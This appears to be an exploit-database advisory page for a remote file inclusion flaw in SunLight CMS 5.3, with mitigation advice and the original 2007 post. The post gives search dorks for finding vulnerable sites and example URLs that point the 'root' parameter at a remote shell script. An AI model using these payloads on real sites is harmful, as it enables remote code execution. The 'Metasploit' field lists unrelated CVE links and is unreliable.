header-logo
Suggest Exploit
vendor:
SunLight CMS
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: SunLight CMS
Affected Version From: SunLight CMS 5.3 and below
Affected Version To: SunLight CMS 5.3
Patch Exists: NO
Related CWE: CVE not provided
CPE: a:sunlight_cms:sunlight_cms:5.3
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2023-22024/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-20212/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-24834/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-27395/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-22325/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-3326/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/apple-osx-cups-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-1825/https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=3https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=4https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2
Other Scripts:
Platforms Tested:
2007

SunLight CMS 5.3 <= Remote File Inclusion Vulnerability

This vulnerability allows remote attackers to include arbitrary files and execute malicious code by exploiting the 'connect.php' and 'startup.php' files in SunLight CMS 5.3 and below. The vulnerability exists due to the lack of proper input validation and sanitization in the affected files, which allows an attacker to manipulate the 'root' parameter and include arbitrary files from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of SunLight CMS that addresses the file inclusion vulnerability. Additionally, it is advised to implement proper input validation and sanitization in the affected files to prevent remote file inclusion.
Source

Exploit-DB raw data:

##############################################################################################
#SunLight CMS 5.3 <= Remote File Inclusion Vulnerability
#
#Dork:""cms SunLight 5.2"
#
#Dork2:http://search.seznam.cz/searchScreen?w="cms+SunLight+5.2"&mod=f
#
#Vuln Code
##############################################################################################
#
#ERROR1:_connect.php
#
#       /*-----vlozeni pristupovych dat-----*/
#      include($root."_access.php");   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/_connect.php?root=[[Sh3LL Script]]
#
#ERROR2:modules/startup.php
#
#    include($root."_connect.php");
#    include($root."modules/sessions.php");
#    include($root."modules/content_preload.php"); <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/modules/startup.php?root=[[Sh3LL Script]]
#
#Script Download
##############################################################################################
#
#http://sunlight.profitux.cz/upload/stahuj/system/sunlight_53_standard.zip
#
##############################################################################################
#
#Cyber-Security
#
##############################################################################################

# milw0rm.com [2007-05-19]